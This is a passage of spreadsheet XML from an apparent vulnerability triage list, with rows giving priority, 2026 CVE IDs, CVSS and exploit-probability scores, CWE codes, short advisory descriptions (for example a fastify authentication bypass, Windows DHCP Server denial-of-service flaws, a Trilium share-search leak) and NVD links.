          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t>
        </is>
      </c>
    </row>
    <row r="2793">
      <c r="A2793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76098</t>
        </is>
      </c>
      <c r="C2793" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2793" s="5" t="inlineStr"/>
      <c r="F2793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2793" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2793" s="5" t="inlineStr"/>
      <c r="I2793" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2793" s="5" t="inlineStr"/>
      <c r="K2793" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2793" s="5" t="inlineStr">
        <is>
          <t>Mistune is a Python Markdown parser with renderers and plugins. Versions 3.3.0 through 3.3.2 are vulnerable to DoS through deeply nested tokens. HTML rendering creates deeply nested emphasis tokens from consecutive asterisk characters, and recursive rendering in HTMLRenderer.render_token() can exceed Python's recursion limit and raise RecursionError, allowing crafted Markdown to crash a parsing process. This issue is fixed in version 3.3.3</t>
        </is>
      </c>
      <c r="M2793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76098</t>
        </is>
      </c>
    </row>
    <row r="2794">
      <c r="A2794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="C2794" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2794" s="5" t="inlineStr"/>
      <c r="F2794" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2794" s="5" t="inlineStr"/>
      <c r="H2794" s="5" t="inlineStr"/>
      <c r="I2794" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2794" s="5" t="inlineStr"/>
      <c r="K2794" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2794" s="5" t="inlineStr">
        <is>
          <t>fastify versions &gt;= 4.0.0 and before 5.12.2 can route a malformed URL sent under one plugin prefix to the custom not-found handler of a different sibling plugin, and invoke it without the preHandler hook declared for that handler. The internal not-found router for encapsulated handlers dispatches malformed paths through a single shared handler pointer before URL decoding, ignoring the prefix and skipping the selected handler's normal lifecycle. An unauthenticated attacker can therefore reach an authentication-protected private fallback through an unrelated public prefix and read its full response, bypassing the authentication hook and breaking prefix encapsulation. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="2795">
      <c r="A2795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76560</t>
        </is>
      </c>
      <c r="C2795" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2795" s="5" t="inlineStr"/>
      <c r="F2795" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2795" s="5" t="inlineStr"/>
      <c r="H2795" s="5" t="inlineStr"/>
      <c r="I2795" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2795" s="5" t="inlineStr"/>
      <c r="K2795" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2795" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. The SELFDN ACI bind-rule evaluator incorrectly matches an anonymous LDAP client's empty bind DN against an empty stored attribute value, allowing an unauthenticated client to satisfy access control checks intended to require a matching authenticated identity. This can allow an anonymous LDAP client to perform an operation, such as adding or modifying a directory entry, that a SELFDN-based ACI intended to restrict to a specific authenticated user.</t>
        </is>
      </c>
      <c r="M2795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76560</t>
        </is>
      </c>
    </row>
    <row r="2796">
      <c r="A2796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76905</t>
        </is>
      </c>
      <c r="C2796" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2796" s="5" t="inlineStr"/>
      <c r="F2796" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2796" s="5" t="inlineStr"/>
      <c r="H2796" s="5" t="inlineStr"/>
      <c r="I2796" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2796" s="5" t="inlineStr"/>
      <c r="K2796" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2796" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.10.0 until 0.141.0, openapi3filter.convertParseError in openapi3filter/validation_error_encoder.go dereferences e.Parameter.In without checking whether e.Parameter is nil. A malformed non-string scalar field in a multipart/form-data request body produces a nested ParseError with a nil RequestError.Parameter, and applications that render the validation error through openapi3filter.ConvertErrors or ValidationErrorEncoder panic. An unauthenticated client can repeatedly send such requests to deny service when the application lacks a recovery boundary. JSON request bodies and applications that do not use these error-rendering helpers are not affected. This issue is fixed in version 0.141.0.</t>
        </is>
      </c>
      <c r="M2796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76905</t>
        </is>
      </c>
    </row>
    <row r="2797">
      <c r="A2797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76956</t>
        </is>
      </c>
      <c r="C2797" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2797" s="5" t="inlineStr"/>
      <c r="F2797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2797" s="5" t="inlineStr"/>
      <c r="H2797" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="I2797" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2797" s="5" t="inlineStr"/>
      <c r="K2797" s="5" t="inlineStr">
        <is>
          <t>CWE-394</t>
        </is>
      </c>
      <c r="L2797" s="5" t="inlineStr">
        <is>
          <t>In libexpat 2.8.2 and 2.8.3 before 2.8.4, misinterpretation of getentropy's return code leads to insufficient entropy, which results in being vulnerable to hash flooding attacks, causing a denial of service via crafted XML content.</t>
        </is>
      </c>
      <c r="M2797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76956</t>
        </is>
      </c>
    </row>
    <row r="2798">
      <c r="A2798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="C2798" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2798" s="5" t="inlineStr"/>
      <c r="F2798" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2798" s="5" t="inlineStr"/>
      <c r="H2798" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I2798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2798" s="5" t="inlineStr"/>
      <c r="K2798" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2798"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M2798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="2799">
      <c r="A2799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77124</t>
        </is>
      </c>
      <c r="C2799" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2799" s="5" t="inlineStr"/>
      <c r="F2799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2799" s="5" t="inlineStr"/>
      <c r="H2799" s="5" t="inlineStr"/>
      <c r="I2799" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2799" s="5" t="inlineStr"/>
      <c r="K2799" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2799" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Nexus Repository 3, the script execution endpoint (POST /service/rest/v1/script/{name}/run) did not verify whether script execution had been administratively disabled. An account holding script-execution permission could continue to run previously-created scripts even after an administrator set nexus.scripts.allowCreation=false, undermining the expectation that this setting fully blocks script execution.</t>
        </is>
      </c>
      <c r="M2799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77124</t>
        </is>
      </c>
    </row>
    <row r="2800">
      <c r="A2800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77384</t>
        </is>
      </c>
      <c r="C2800" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2800" s="5" t="inlineStr"/>
      <c r="F2800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2800" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2800" s="5" t="inlineStr"/>
      <c r="I2800" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2800" s="5" t="inlineStr"/>
      <c r="K2800" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L2800" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 4.2.9, the reservation refresh path in reservation-store.ts reuses the same retimeableSignal but unconditionally registers another abort listener on every refresh. As a result, a remote peer can repeatedly send valid RESERVE requests for the same reservation, causing unbounded listener and closure growth in @libp2p/circuit-relay-v2 relay servers and leading to denial of service. This issue is fixed in version 4.2.9.</t>
        </is>
      </c>
      <c r="M2800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77384</t>
        </is>
      </c>
    </row>
    <row r="2801">
      <c r="A2801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77438</t>
        </is>
      </c>
      <c r="C2801" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2801" s="5" t="inlineStr"/>
      <c r="F2801" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2801" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2801" s="5" t="inlineStr"/>
      <c r="I2801" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2801" s="5" t="inlineStr"/>
      <c r="K2801" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L2801" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the public share-search endpoint does not enforce the per-note shareCredentials and shareHiddenFromTree controls, allowing an unauthenticated visitor to read the titles, tree paths, and content of protected shared notes. The endpoint authorizes only the ancestor note supplied in the request and then runs a full-text search across the entire published subtree, returning each matching note's title, share identifier, and hierarchical path without re-checking whether that individual note requires a share password or is hidden from the navigation tree. Because the search matches note content, an attacker can enumerate protected notes and use the endpoint as a boolean oracle that confirms arbitrary substrings, recovering the full contents of notes that should be gated behind a password. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M2801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77438</t>
        </is>
      </c>
    </row>
    <row r="2802">
      <c r="A2802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77465</t>
        </is>
      </c>
      <c r="C2802" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2802" s="5" t="inlineStr"/>
      <c r="F2802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2802" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2802" s="5" t="inlineStr"/>
      <c r="I2802" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2802" s="5" t="inlineStr"/>
      <c r="K2802" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2802" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M2802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77465</t>
        </is>
      </c>
    </row>
    <row r="2803">
      <c r="A2803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="C2803" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2803" s="5" t="inlineStr"/>
      <c r="F2803" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2803" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2803" s="5" t="inlineStr"/>
      <c r="I2803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2803" s="5" t="inlineStr"/>
      <c r="K2803" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2803" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="2804">
      <c r="A2804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="C2804" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2804" s="5" t="inlineStr"/>
      <c r="F2804" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2804" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2804" s="5" t="inlineStr"/>
      <c r="I2804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2804" s="5" t="inlineStr"/>
      <c r="K2804" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2804" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="2805">
      <c r="A2805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="C2805" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2805" s="5" t="inlineStr"/>
      <c r="F2805" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2805" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2805" s="5" t="inlineStr"/>
      <c r="I2805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2805" s="5" t="inlineStr"/>
      <c r="K2805" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2805" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="2806">
      <c r="A2806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="C2806" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2806" s="5" t="inlineStr"/>
      <c r="F2806" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2806" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2806" s="5" t="inlineStr"/>
      <c r="I2806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2806" s="5" t="inlineStr"/>
      <c r="K2806" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2806" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="2807">
      <c r="A2807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="C2807" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2807" s="5" t="inlineStr"/>
      <c r="F2807" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2807" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2807" s="5" t="inlineStr"/>
      <c r="I2807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2807" s="5" t="inlineStr"/>
      <c r="K2807" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2807" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="2808">
      <c r="A2808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77771</t>
        </is>
      </c>
      <c r="C2808" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2808" s="5" t="inlineStr"/>
      <c r="F2808" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2808" s="5" t="inlineStr"/>
      <c r="H2808" s="5" t="inlineStr"/>
      <c r="I2808" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2808" s="5" t="inlineStr"/>
      <c r="K2808" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2808" s="5" t="inlineStr">
        <is>
          <t>The miniOrange 2FA  WordPress plugin before 6.3.1, miniOrange 2FA  WordPress plugin before 19.3 does not scope its second-factor attempt limit to the account being attacked, keying it instead to an identifier the client supplies and can change at will, allowing an attacker who already knows a victim's password to make unlimited one-time-passcode guesses and defeat the second factor. A second validation endpoint applies no attempt limit at all.</t>
        </is>
      </c>
      <c r="M2808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77771</t>
        </is>
      </c>
    </row>
    <row r="2809">
      <c r="A2809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77807</t>
        </is>
      </c>
      <c r="C2809" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2809" s="5" t="inlineStr"/>
      <c r="F2809" s="5" t="inlineStr"/>
      <c r="G2809" s="5" t="inlineStr"/>
      <c r="H2809" s="5" t="inlineStr"/>
      <c r="I2809" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2809" s="5" t="inlineStr"/>
      <c r="K2809" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2809" s="5" t="inlineStr">
        <is>
          <t>The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 11.0.4 via the `user[name]` Parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Exploitation requires "Embed images" option in AcyMailing configuration being enabled.</t>
        </is>
      </c>
      <c r="M2809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77807</t>
        </is>
      </c>
    </row>
    <row r="2810">
      <c r="A2810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="C2810" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2810" s="5" t="inlineStr"/>
      <c r="F2810" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2810" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2810" s="5" t="inlineStr"/>
      <c r="I2810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2810" s="5" t="inlineStr"/>
      <c r="K2810" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2810" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="2811">
      <c r="A2811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="C2811" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2811" s="5" t="inlineStr"/>
      <c r="F2811" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2811" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2811" s="5" t="inlineStr"/>
      <c r="I2811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2811" s="5" t="inlineStr"/>
      <c r="K2811" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2811" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="2812">
      <c r="A2812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="C2812" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2812" s="5" t="inlineStr"/>
      <c r="F2812" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2812" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2812" s="5" t="inlineStr"/>
      <c r="I2812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2812" s="5" t="inlineStr"/>
      <c r="K2812" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2812" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="2813">
      <c r="A2813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="C2813" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2813" s="5" t="inlineStr"/>
      <c r="F2813" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2813" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2813" s="5" t="inlineStr"/>
      <c r="I2813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2813" s="5" t="inlineStr"/>
      <c r="K2813" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2813" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="2814">
      <c r="A2814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="C2814" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2814" s="5" t="inlineStr"/>
      <c r="F2814" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2814" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2814" s="5" t="inlineStr"/>
      <c r="I2814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2814" s="5" t="inlineStr"/>
      <c r="K2814" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2814" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="2815">
      <c r="A2815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="C2815" s="5" t="n">
        <v>7.5</v>
      </c>
